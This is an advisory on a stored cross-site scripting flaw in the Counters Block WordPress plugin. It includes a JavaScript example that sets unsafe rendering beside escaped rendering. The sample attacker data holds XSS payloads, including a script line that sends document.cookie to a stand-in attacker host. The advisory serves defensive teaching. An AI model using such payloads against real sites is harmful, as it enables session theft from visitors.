Impact
The vulnerability is a stored (persistent) cross‑site scripting flaw in the bPlugins Counters Block WordPress plugin. Input supplied to the block is saved and later rendered into pages without being properly neutralized, so an attacker who can store a payload in the block's content can have arbitrary JavaScript execute in the browser of any visitor, authenticated or not, who views the affected page. Because the script runs in the site's origin with the victim's session, this can lead to session theft, defacement, phishing, or malware distribution, and it compromises the integrity and confidentiality of site data; if the victim is an administrator, the script can issue authenticated requests on their behalf. The weakness is classified as CWE‑79, Improper Neutralization of Input During Web Page Generation ('Cross‑site Scripting').
Affected Systems
The affected product is the Counters Block WordPress plugin by bPlugins, in all versions up to and including 1.1.2. No lower bound is given, so any installation still running 1.1.2 or an earlier release should be treated as vulnerable.
Risk and Exploitability
The CVSS base score of 6.5 places the flaw in the medium severity range. The EPSS score of less than 1% indicates a very low estimated probability of exploitation in the wild over the next 30 days, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. EPSS measures observed exploitation likelihood, not ease of exploitation: a stored XSS in a WordPress plugin is straightforward to exploit for anyone who can save content through the plugin's block, by placing a script payload in one of its stored fields. When a victim loads the page, the payload runs in their browser with that user's client‑side privileges and session; an administrator viewing the page is the most damaging case. The attack vector is inferred rather than confirmed by the source: improper handling of the data stored for the counters block, which is then rendered into the page without escaping.
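The following is an added illustration of the CWE‑79 pattern described above, not code from the Counters Block plugin: a hypothetical counter block whose stored attributes (number, prefix, suffix, label are assumed names) are turned into front‑end markup. The unsafe renderer concatenates the stored values verbatim; the hardened renderer escapes each value for the context it lands in and coerces the numeric field so it can never carry markup. The attacker‑supplied attribute values are constructed sample data.

```javascript
// Added example: a hypothetical counter block, NOT the plugin's own code.
// Attribute names (number, prefix, suffix, label) and the markup are assumptions.

// Escape the five characters that matter in HTML text and double-quoted
// attribute values. The WordPress PHP equivalents are esc_html() and esc_attr().
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern (CWE-79): stored attributes are concatenated straight into
// markup. A value such as `"><img src=x onerror=alert(1)>` closes the attribute or
// element it lands in and injects a new element that executes in the visitor's browser.
function renderCounterUnsafe(attrs) {
  return (
    `<div class="counter" data-target="${attrs.number}">` +
      `<span class="counter-value">${attrs.prefix}0${attrs.suffix}</span>` +
      `<p class="counter-label">${attrs.label}</p>` +
    `</div>`
  );
}

// Hardened pattern: every stored value is escaped for the context it is emitted
// into, and the numeric field is coerced to a finite number (falling back to 0).
function renderCounterSafe(attrs) {
  const parsed = Number(attrs.number);
  const target = Number.isFinite(parsed) ? parsed : 0;
  return (
    `<div class="counter" data-target="${target}">` +
      `<span class="counter-value">${escapeHtml(attrs.prefix)}0${escapeHtml(attrs.suffix)}</span>` +
      `<p class="counter-label">${escapeHtml(attrs.label)}</p>` +
    `</div>`
  );
}

// Crude check used to compare the two renderers: does the markup contain an element
// carrying an inline event handler, or a tag the template itself never emits?
// Escaped text such as "&lt;script&gt;" or "onerror=" inside element text does not match.
function containsInjectedMarkup(html) {
  return /<[a-z]+\b[^>]*\bon\w+\s*=/i.test(html) || /<(img|script)\b/i.test(html);
}

// Constructed attacker-controlled attribute values (sample data for this example).
const maliciousAttrs = {
  number: '100" onmouseover="alert(document.cookie)',
  prefix: '$',
  suffix: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  label: '"><img src=x onerror=alert(1)>',
};

// Stand-alone demonstration: the unsafe output is exploitable, the safe one is inert.
console.log('unsafe injected:', containsInjectedMarkup(renderCounterUnsafe(maliciousAttrs)));
console.log('safe injected:  ', containsInjectedMarkup(renderCounterSafe(maliciousAttrs)));
```

In a real WordPress block the same rule applies on the server side: a PHP `render_callback` should pass attribute values through `esc_attr()` or `esc_html()`, and fields that legitimately carry limited HTML should go through `wp_kses_post()` rather than being echoed as saved.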